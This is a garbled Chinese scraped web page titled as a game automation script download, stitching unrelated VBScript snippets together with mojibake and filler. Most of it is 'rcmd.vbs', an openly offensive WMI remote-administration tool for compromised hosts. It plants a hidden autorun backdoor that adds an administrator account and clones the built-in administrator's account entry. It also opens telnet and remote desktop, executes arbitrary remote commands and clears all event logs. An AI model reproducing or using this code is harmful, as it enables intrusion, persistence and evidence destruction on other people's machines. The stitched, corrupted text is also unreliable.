神武3手游自动日常挂机辅助脚本大漠下载

发布时间:2021-06-07 来源:脚本之家 点击:

一、利用API获取窗口的标题ば陆ù疤澹疲铮颍恚焙桶磁ィ茫铮恚恚幔睿洌豹ぴ诖疤迥?橹刑砑尤缦麓码:
OptionExplicit
PrivateDeclareFunctionGetWindowTextLib"us—
er32"Alias"GetWindowTextA"(ByValhwndAs
Long,ByVallpStringAsString,ByValcchAs
Long)AsLong
'在窗体声明节中加入API函数“GetWindowText”的说明
'函数将向lpstring中载入要获得的窗体caption
PrivateSubCommand1_Click()
DimreturncodeAsLong
DimcaptextAsString
DimcaplenAsLong
captext=String$(100,0)
caplen=99
returncode=GetWindowText(ByValme.hwnd,
ByValcaptext,ByValcaplen)
printreturncode
Printcaptext
Printcaplen
EndSub
二、获取鼠标在当前窗口(客户区)的屏幕坐标そ立一新项目窗体form1并添加控件文本框Text1、Text2ぴ诖疤迥?橹惺淙耄邯
OptionExplicit
PrivateDeclareFunctionGetCursorPosLib"user32"
(lpPointAsPOINTAPI)AsLong
PrivateTypePOINTAPI
XAsLongYAsLong
EndType
DimptAsPOINTAPI
DimreturncodeAsLong
PrivateSubForm_Load()
Text1.Text=""
Text2.Text=""
MaxButton=False
MinButton=False
Form1.WindowState=2
EndSub
PrivateSubForm_MouseMove(ButtonAsInteger,
ShiftAsInteger,XAsSingle,YAsSingle)
'注意pt结构是按引用传递的
returncode=GetCursorPos(pt)
Text1.Text=pt.X
Text2.Text=pt.Y
EndSub
三、记录Windows使用时间
建立新项目窗口form1,输入代码:
PrivateSubForm_Load()
form1.visible=false
Openapp.paht+"memo.txt"ForAppendAs#1
Print#1,"启动windows:"&CStr(Now)
Close#1
EndSub
PrivateSubForm_Unload(CancelAsInteger)
Openapp.paht+"memo.txt"ForAppendAs#1
Print#1,"关闭windows:"&CStr(Now)
Close#1
End
EndSub
最后将此程序加入启动组即可从此以后,要制造vbs脚本病毒不用再学编程了

动画视听语言与分镜头脚本设计


' searches for and returns the value of a command line argument of the form
' /argName:value from the supplied array. erases the entry in the array so
' that only untouched entries remain.

function GetArgValue(argName, args())
dim a
dim v
dim argNameLength
dim x
dim argCount
dim fullArgName

fullArgName="/" & argName & ":"
argCount=Ubound(args)

' Get the length of the argname we are looking for
argNameLength=Len(fullArgName)
GetArgValue="" ' default to nothing

for x=0 To argCount
if Len(args(x)) >=argNameLength then

a=Mid(args(x), 1, argNameLength)
if UCase(a)=UCase(fullArgName) then

' erase it so we can look for unknown args later
v=args(x)
args(x)=""

if Len(v) > argNameLength then
GetArgValue=Mid(v, argNameLength + 1)
exit function
else
GetArgValue=""
exit function
end if
end if
end if
next
end function

更多的时候,我们需要在脚本之间共享变量,以及相互调用函数如果要实现复杂的功能,如捕捉特征点,获得特性,参数化绘图,等能否让完成界面及计算功能,把参数传给一个Lisp程序,然后再将程序调入环境中完成绘图呢?答案是肯定的这就要用到“SendKey"语句


使用:D:\>iget.vbs

4.rcmd.vbs
'***************
'rcmd.vbsby黑嘿黑
'***************
onerrorresumenext
setoutstreem=wscript.stdout
setinstreem=wscript.stdin
if(lcase(right(wscript.fullname,11))="wscript.exe")then
setobjShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))
endif
ifwscript.arguments.count<3then
usage()
wscript.echo"Notenoughparameters."
wscript.quit
endif

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)

usage()
outstreem.write"Conneting"&ipaddress&"...."
setobjlocator=createobject("wbemscripting.swbemlocator")'20
setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
objswbemservices.security_.privileges.add23,true
objswbemservices.security_.privileges.add18,true
objswbemservices.security_.privileges.add7,true
objswbemservices.security_.privileges.add11,true
iferrornumber<>0then
wscript.echo"Error!"
callmain()
else
wscript.echo"OK!"
endif
callmain()

'***********************************************************
functiondoor()
outstreem.write"Creatingtheblankdoor.."
setobjinstproc=objswbemservices.get("win32_process")
cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%\system32\svrer.vbs"_
&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%\system32\svrer.vbs"_
&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs"_
&"&&echoFA.Attributes=34>>%windir%\system32\svrer.vbs"_
&"&&echosett=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs"_
&"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%\system32\svrer.vbs"_
&"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%\system32\svrer.vbs"_
&"&&echot.WriteLine(""Attrib+h%windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs"_
&"&&echot.Close>>%windir%\system32\svrer.vbs"_
&"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs"_
&"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%\system32\svrer.vbs"_
&"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%\system32\svrer.vbs"_
&"&&echowsh.Regwrite

""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_
&"&&echowsh.Regwrite

""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win

dir%\system32\svrer.vbs"_
&"&&echowsh.regwrite""HKEY_LOCAL_MACHINE\Software\Microsoft\Command

Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_
&"&&echowsh.regwrite""HKEY_CURRENT_USER\Software\Microsoft\Command

Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_
&"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%\system32\SYSTEM.bat"",0,true

>>%windir%\system32\svrer.vbs"
objinstproc.create(cmddoor)
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write"Runingtheblankdoor.."
objinstproc.create("cmd/ccscript%windir%\system32\svrer.vbs")
showerror(err.number)
callmain()
endfunction
'***********************************************************
functionca()
Wscript.Echo"enterthecausername:"
causername=WScript.StdIn.Readline()
Wscript.Echo"enterthecapassword:"
capassword=WScript.StdIn.Readline()
outstreem.write"GettingSIDof"&causername&"...."
setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34))
foreachobjinstsidincolinstsid
strsid=objinstsid.sid
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
ifstrsid=""then
wscript.echo"Error."&vbcrlf&"Usernameisnotexist."
callmain()
else
wscript.echo"OK!"
endif

outstreem.write"Prepairing.."
setobjinstproc=objswbemservices.get("win32_process")
showerroronly(err.number)
cmdline="cmd/cechosetoreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs"_
&"&&echooreg.getbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue>>%temp%\ca.vbs"_
&"&&echooreg.setbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users"?name&""",""F"",uvalue>>%temp%\ca.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%\ca.vbs"_
&"&&echosh.regwrite""HKLM\SOFTWARE\Microsoft\WindowsScriptHost\Settings\caflag"",""1"">>%temp%\ca.vbs"
objinstproc.create(cmdline)
showerroronly(err.number)
cmdline="cmd/cechoatime=time>%temp%\getsys.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%\getsys.vbs"_
&"&&echosh.run""cmd/cat23:59cscript%temp%\ca.vbs"",0,true>>%temp%\getsys.vbs"_
&"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%\getsys.vbs"_
&"&&echowscript.sleep(1100)>>%temp%\getsys.vbs"_
&"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%\getsys.vbs"
objinstproc.create(cmdline)
showerror(err.number)

outstreem.write"Processing."
setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'")
showerroronly(err.number)
foreachobjinstsvrincolinstsvr
flag1=0
flag2=0
ifobjinstsvr.startmode="Disabled"then
objinstsvr.changestartmode("Manual")
flag1=1
endif
ifobjinstsvr.started=flasethen
errnumber=objinstsvr.startservice()
flag2=1
endif
showerroronly(err.number)
objinstproc.create("cmd/ccscript%temp%\getsys.vbs")
showerroronly(err.number)
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
fori=1to20
objinstreg.getstringvalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag",svalue
ifsvalue="1"then
exitfor
else
wscript.sleep(500)
endif
next
objinstproc.create("netuser"&causername&""&capassword)
ifflag1thenobjinstsvr.changestartmode("Disabled")
ifflag2thenobjinstsvr.stopservice()
next
ifsvalue<>"1"then
wscript.echo"Error."&vbcrlf&"Waitingtimeout."
else
showerror(err.number)
endif

outstreem.write"CleanUp.."
objinstproc.create("cmd/cdel%temp%\ca.vbs")
showerroronly(err.number)
objinstproc.create("cmd/cdel%temp%\getsys.vbs")
showerroronly(err.number)
ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag"
showerror(err.number)
callmain()
endfunction

functionshowerroronly(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
outstreem.write"."
endif
endfunction

'***********************************************************
functionshare()
Wscript.Echostring(18,"-")
Wscript.Echo"0.返回CMD>="
wscript.echo"1.列出共享信息:="
Wscript.Echo"2.创建共享="
Wscript.Echo"3.删除共享="
Wscript.Echostring(18,"-")
Wscript.Echo"pleasechosetheparameter:"
parameters=WScript.StdIn.Readline()
SelectCaseparameters
case"quit","0"
main()
case"list","1"
listshare()
case"open","2"'40
openshare()
case"close","3"
closeshare()
endSelect
endfunction

functionlistshare()
outstreem.write"ListingtheNetsharefrom"&ipaddress&"...."
SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share")
showerror(err.number)'50
wscript.echo_
("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path")
ForeachobjShareincolShares
wscript.echo_
(objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path)
Next
wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!"
callshare()
endfunction

functionopenshare()
wscript.echo"Enterthepath:"'70
path=WScript.StdIn.Readline()
wscript.echo"Enterthename:"
sname=WScript.StdIn.Readline()
ConstFILE_SHARE=0
ConstMAXIMUM_CONNECTIONS=25
SetobjNewShare=objswbemservices.Get("Win32_Share")
errReturn=objNewShare.Create_
(path,sname,FILE_SHARE,_
MAXIMUM_CONNECTIONS,"默认共享")
wscript.echo"ThenSharehavebeenCeatedSuccessfully!"
callshare()
endfunction

functioncloseshare()
wscript.echo"PleseEnterThename:"
kname=WScript.StdIn.Readline()
outstreem.write"killingthe"&kname&"...."
SetcolShares=objswbemservices.ExecQuery_
("Select*fromWin32_ShareWhereName="&"'"&kname&"'")
ForEachobjShareincolShares
objShare.Delete
Next
showerror(err.number)
callshare()
endfunction
'***********************************************************
functionlistsvr()
outstreem.write"ListingtheServicefrom"&ipaddress&"...."
SetcolListOfServices=objswbemservices.ExecQuery_
("Select*fromWin32_Service")
showerror(err.number)
wscript.echo_
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName")
ForEachobjServiceincolListOfServices
iflen(objService.name)<8then
strname=objService.name&chr(9)
else
strname=objService.name
endif
wscript.echo_
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)
Next
wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!"
callmain()
endfunction
'************************************************************
functionreboot()
outstreem.write"Now,restartingtarget...."
strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'"
setcolinstances=objswbemservices.execquery(strwqlquery)
foreachobjinstanceincolinstances
objinstance.win32shutdown(6)
next
showerror(err.number)
callmain()
endfunction
'*************************************************************
functioninf()
outstreem.write"GettingInfomationfrom"&ipaddress&"...."
setobj1=objget("win32_computersystem")
showerror(err.number)
wscript.echo""&vbcrlf
setobj2=objget("win32_operatingsystem")
setcol3=objswbemservices.instancesof("win32_processor")
setobj4=objget("win32_logicalmemoryconfiguration")
setobj5=objget("win32_bios")
setobj6=objget("win32_displayconfiguration")
setcol7=objswbemservices.instancesof("win32_diskdrive")
setcol8=objswbemservices.instancesof("win32_logicaldisk")
setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration")
setcol10=objswbemservices.instancesof("win32_quickfixengineering")

wnl"OSInfo:"
wnl"ComputerName:"&obj1.name
wnl"UserName:"&obj1.username
wnl"Domain:"&obj1.domain
domainrole=""
selectcaseobj1.domainrole
case0
domainrole="Workstation"
case1
domainrole="MemberWorkstation"
case2
domainrole="Server"
case3
domainrole="MemberServer"
case4
domainrole="BackupDomainController"
case5
domainrole="MainDomainController"
endselect
withobj2
wnl"DomainRole:"&domainrole
wnl"Caption:"&.caption
wnl"Organization:"&.organization
wnl"RegisteredUser:"&.registereduser
wnl"InstallDate:"&timeformat(.installdate)
wnl"LastBootUpTime:"&timeformat(.lastbootuptime)
wnl"WindowsDirectory:"&.windowsdirectory
wnl"SystemDirectory:"&.systemdirectory
wnl"BootDevice:"&.bootdevice
wnl"CountryCode:"&.countrycode
wnl"CSName:"&.csname
wnl"Description:"&.description
wnl"Manufacturer:"&.manufacturer
wnl"SerialNumber:"&.serialnumber
wnl"Version:"&.version
wnl"SystemType:"&obj1.systemtype
wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s"
wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0)
fori=1toubound(obj1.systemstartupoptions)
wnlspace(28)&obj1.systemstartupoptions(i)
next
endwith

wnlvbcrlf&"ProcessorInfo:"
wnl"NumberOfProcessors:"&obj1.numberofprocessors
foreachobj3incol3
withobj3
wnl"DeviceID:"&.deviceid
wnl"Name:"&.name
wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz"
wnl"Description:"&.description
wnl"ExtClock:"&.extclock&"MHz"
wnl"L2CacheSize:"&.l2cachesize&"KB"
wnl"L2CacheSpeed:"&.l2cachespeed&"MHz"
wnl"ProcessorId:"&.processorid
wnl"Manufacturer:"&.manufacturer
wnl"SocketDesignation:"&.socketdesignation
wnl"AddressWidth:"&.addresswidth&"Bit"
wnl"DataWidth:"&.datawidth&"Bit"
endwith
next

withobj4
wnlvbcrlf&"MemoryInfo:"
wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB"
wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB"
wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB"
wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB"
wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB"
endwith

wnlvbcrlf&"BIOSInfo:"
wnl"Description:"&obj5.description
wnl"CurrentLanguage:"&obj5.currentlanguage
wnl"Version:"&obj5.version
wnl"Manufacturer:"&obj5.manufacturer


withobj6
wnlvbcrlf&"DisplayConfiguration:"
wnl"Caption:"&.caption
wnl"DeviceName:"&.devicename
wnl"DriverVersion:"&.driverversion
wnl"DisplayFrequency:"&.displayfrequency&"Hz"
wnl"BitsPerPel:"&.bitsperpel&"Bit"
wnl"Pels:"&.pelswidth&"x"&.pelsheight
endwith

wnlvbcrlf&"DiskInfo:"
foreachobj7incol7
withobj7
wnl"DeviceID:"&.deviceid
wnl"Caption:"&.caption
wnl"InterfaceType:"&.interfacetype
wnl"SCSIBus:"&.scsibus
wnl"SCSILogicalUnit:"&.scsilogicalunit
wnl"SCSIPort:"&.scsiport
wnl"SCSITargetId:"&.scsitargetid
wnl"SectorsPerTrack:"&.sectorspertrack&"KB"
wnl"Partitions:"&.partitions
wnl"Size:"&sizeformat(.size)
endwith
next
str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4)
str=str+"Size"+space(6)+"Free"+space(12)+"Label"
wnlstr
foreachobj8incol8
withobj8
drivetype=""
selectcase.drivetype
case0
drivetype="Unknow"
case1
drivetype="NoRootDir"
case2
drivetype="Removable"
case3
drivetype="Fixed"
case4
drivetype="Network"
case5
drivetype="CD-ROM"
case6
drivetype="RAM"
endselect
strpercent=""
if.size<>""and.freespace<>""then
strpercent="("&formatpercent(.freespace/.size,0)&")"
endif
str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)
str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename
wnlstr
endwith
next

wnlvbcrlf&"NICInformaton:"
foreachobj9incol9
withobj9
if.IPEnabledthen
wnl"Index:"&.index
wnl"Description:"&.description
wnl"DHCPEnabled:"&.dhcpenabled
wnl"DHCPServer:"&.dhcpserver
wnl"DNSHostName:"&.dnshostname
wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder)
wnl"WINSPrimaryServer:"&.winsprimaryserver
wnl"IPAddress:"&wfl(.ipaddress)
wnl"MACAddress:"&.macaddress
wnl"DefaultIPGateway:"&wfl(.defaultipgateway)
wnl"IPSubnet:"&wfl(.ipsubnet)
wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled
wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols)
wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports)
wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports)
endif
endwith
next

wnlvbcrlf&"HotFixesInfo:"
foreachobj10incol10
wnl"HotFixID:"&obj10.hotfixid
wnl"FixComments:"&obj10.fixcomments
wnl"InstallDate:"&obj10.installdate
wnl"ServicePackInEffect:"&obj10.servicepackineffect
next

wnlvbcrlf&"Applications:"
setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password)
setobj11=objswb1.get("stdregprov")
HKLM=&h80000002
keypath="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
obj11.enumkeyHKLM,keypath,keyarray
redimstr(ubound(keyarray)+1)
j=0
fori=0toubound(keyarray)
obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue
ifstrvalue<>""then
str(j)=strvalue
j=j+1
endif
next
ifj>1then
fori=0toj-1
fork=0toj-i-1
ifstrcomp(str(k),str(k+1),1)=1then
strtemp=str(k+1)
str(k+1)=str(k)
str(k)=strtemp
endif
next
next
endif
fori=0toj-1
wnl""&str(i)
next
wscript.echo""&vbcrlf
wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!"
callmain()
endfunction

subwnl(msg)
wscript.echomsg
ifisobject(of)then
onerrorresumenext
of.writelinemsg
showerror()
onerrorgoto0
endif
endsub

functionwfl(byrefobj)
str=""
fori=0toubound(obj)
str=str&obj(i)&""
next
wfl=str
endfunction

functionwsp(msg,num)
ifmsg<>""then
msg=left(msg,num-1)
wsp=msg&space(num-len(msg))
else
wsp=space(num)
endif
endfunction

functiontimeformat(msg)
timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)
endfunction

functionsizeformat(msg)
ifmsg<>""then
size=msg/1048576
ifsize>1024then
sizeformat=round(size/1024,2)&"GB"
else
sizeformat=round(size,1)&"MB"
endif
endif
endfunction

functionobjget(msg)
setcol=objswbemservices.instancesof(msg)
foreachobjxincol
setobj=objx
next
setobjget=obj
endfunction

'******************************************
functioncommand()
wscript.echo"PleseEnterTheCommand:"
callrun()
endfunction

functionrun()
strcmdline=WScript.StdIn.Readline()
ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then
callmain()
endif
outstreem.write"Runningthecommand...."
setobjinstance=objswbemservices.get("win32_process")
setobjmethod=objinstance.methods_("create")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=strcmdline
setobjoutparam=objinstance.execmethod_("create",objinparam)
ifobjoutparam.returnvalue<>0then
wscript.echo"Error!"
callcommand()
else
wscript.echo"OK!"
endif
wscript.echo"TheProcessIDis"&objoutparam.processid
wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf
callcommand()
endfunction
'*******************************************
functionpslist()
outstreem.write"Listingprocess...."
setcolinstances=objswbemservices.execquery("select*fromwin32_process")
showerror(err.number)
wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"
foreachobjinstanceincolinstances
iflen(objinstance.name)<8then
strname=objinstance.name&chr(9)
else
strname=objinstance.name
endif
wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath
next
wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!"
callmain()
endfunction
'*****************************************
functionpskill()
wscript.echo"pleseentertheprocess'sid:"
strprocess=WScript.StdIn.Readline()
outstreem.write"Killingid="&strprocess&"process...."
setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")
ifvartype(objinstance)<>vbobjectthen
wscript.echovbcrlf&"Specifiedprocessisnotexist."
callmain()
else
setobjmethod=objinstance.methods_("terminate")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.reason=0
setobjoutparam=objinstance.execmethod_("terminate",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!"
endif
callmain()
endfunction
'********************************************************
functiontelnet()
outstreem.write"Queryingstateoftelnetserver...."
setobjswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'")
showerror(err.number)
foreachobjinstanceincolinstances
ifobjinstance.startmode="Disabled"then
outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...."
setobjmethod=objinstance.methods_("changestartmode")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
setobjoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
endif
outstreem.write"Changeingstate...."
ifobjinstance.started=truethen
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully."
else
showerror(intstatus)
wscript.echo"pleseenterthentlm:"
ntlm=WScript.StdIn.Readline()
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(ntlm)orntlm<0orntlm>2then
wscript.echo"ThevalueofNTMLiswrong."
callmain()
endif
ifnotisnumeric(port)then
wscript.echo"Thevalueofportiswrong."
main()
endif
setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)
outstreem.write"SettingNTLM="&ntlm&"...."
setobjinstance1=objswbemservices1.get("stdregprov")
setobjmethod=objinstance1.methods_("SetDWORDvalue")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
outstreem.write"Settingport="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
intstatus=objinstance.startservice()
wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!"
wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell."
endif
next
callmain()
endfunction
'********************************************************
functionrs()
outstreem.write"CheckingTheOSType...."
setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem")
foreachobjinstoscaptionincolinstoscaption
ifinstr(objinstoscaption.caption,"Server")>0then
wscript.echo"OK!"
else
wscript.echo"OK!"
wscript.echo"OSTypeis"&objinstoscaption.caption
wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60
callmain()
endif
next
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(port)orport<1orport>65000then'50
wscript.echo"Thenumberofportiserror."
callmain()
endif
outstreem.write"Writingintoregistry...."
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
withobjinstreg
.createkey,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalueHKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0'70
.createkeyHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalueHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer","TSEnabled",1
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalueHKLM,".DEFAULT\KeyboardLayout\Toggle","Hotkey","1"
.setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp","PortNumber",port
endwith
showerror(err.number)
wscript.echo"Now,youneedtoreboottarget!"
wscript.echo"Doyouwanttoreboottargetnow?[y/n]"
strcancel=WScript.StdIn.Readline()
ifstrcancel="n"then
wscript.echo"youneedtoreboottargetthen!!"
callmain()
else
callreboot()
endif
wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!"
callmain()
endFunction
'**************************************************************
functionclog()
outstreem.write"Clearingalllogs...."
strwqlquery="select*fromWin32_NTEventLogFile"
setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)
foreachobjinstanceincolinstances
ifobjinstance.cleareventlog()<>0then
wscript.echo"Error!"'100
callmain()
endif
next
wscript.echo"OK!"
wscript.echo"AlllogshavebeenclearedSuccessfully!"
callmain()
endfunction
'***************************************************************
functionshowerror(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
wscript.echo"OK!"
endif
endfunction
'*****************************************************************
functionusage()
wscript.echostring(79,"*")
wscript.echo"RCMDv1.05"
wscript.echo"RemoteexecutionScript,by黑嘿黑"
wscript.echo"Welcometovisite"
wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com"
wscript.echo"Usage:"
wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword"
wscript.echo"Thenchosethecommand>"
wscript.echostring(79,"*")
endfunction
'**********************************************************
functionmain()
wscript.echo""
wscript.echo"Nowchosethecommand>"
wscript.echo"0.quit退出脚本"
wscript.echo"1.telnet远程开/关telnet"
wscript.echo"2.3389远程开3389"
wscript.echo"3.clog远程删除所有日志"
wscript.echo"4.getf获取肉鸡系统信息"
wscript.echo"5.pslist例出进程"
wscript.echo"6.pskill删除进程"
wscript.echo"7.command远程执行DOS命令"
wscript.echo"8.reboot远程重启肉鸡"
wscript.echo"9.slist例出远程肉鸡上的服务信息"
wscript.echo"A.Share1.列出共享2.创建共享3.删除共享"
wscript.echo"B.ca克隆帐号"
wscript.echo"C.Door种植后门"
wscript.echostring(79,"*")
wscript.echo"CMD>"
cmd=WScript.StdIn.Readline()
wscript.echo""
SelectCasecmd
case"telnet","1"
telnet()
case"3389","2"
rs()
case"clog","3"
clog()
case"getf","4"
inf()
case"psl","pslist","5"
pslist()
case"psk","pskill","6"
pskill()
case"cmd","command","7"
command()
case"reboot","8"
reboot()
case"slist","9"
listlistsvr()
case"share","10","a","A"
share()
case"B","b","11"
ca()
case"C","c","12"
door()
case"quit","0"
wscript.quit
endselect
endfunction



标签:

  为了方便代码的书写和调用,我在类中引用了枚举的编程方法


Function md5_file(filename, raw_output)
Dim HashedData, Utility, Stream
Set HashedData=CreateObject("CAPICOM.HashedData")
Set Utility=CreateObject("CAPICOM.Utilities")
Set Stream=CreateObject("ADODB.Stream")
HashedData.Algorithm=3
Stream.Type=1
Stream.Open
Stream.LoadFromFile filename
Do Until Stream.EOS
HashedData.Hash Stream.Read(1024)
Loop
If raw_output Then
md5_file=Utility.HexToBinary(HashedData.Value)
Else
md5_file=HashedData.Value
End If
End Function
本文将介绍采用VisualBasicforWindows(下称VB)开发Windows应用程序时如何读写INI文件


算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了众包抢单2018有了Byte数组,这些问题就将迎刃而解



复制移动删除文件

和文件夹一样我们既可以使用fso提供的方法也可以用file对象

setfs=wscript.createobject(“scripting.filesystemobject”)

fs.copyfile“c:\asd.txt”,”d:\1\asd.txt”,true‘复制文件,如果已存在就强制覆盖

fs.movefile“c:\asd.txt”,“d:\”‘移动

fs.deletefile“c:\asd.txt”‘删除



好了,下一章我们就要学习文件的读写了,文件的读写是文件系统,尤其是黑客编程里面十分重要的一部分,今天打字可能有很多错误,大家看的时候仔细一点,不懂得多看看msdn,要提高水平只有靠自己,别人是帮不了你的

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号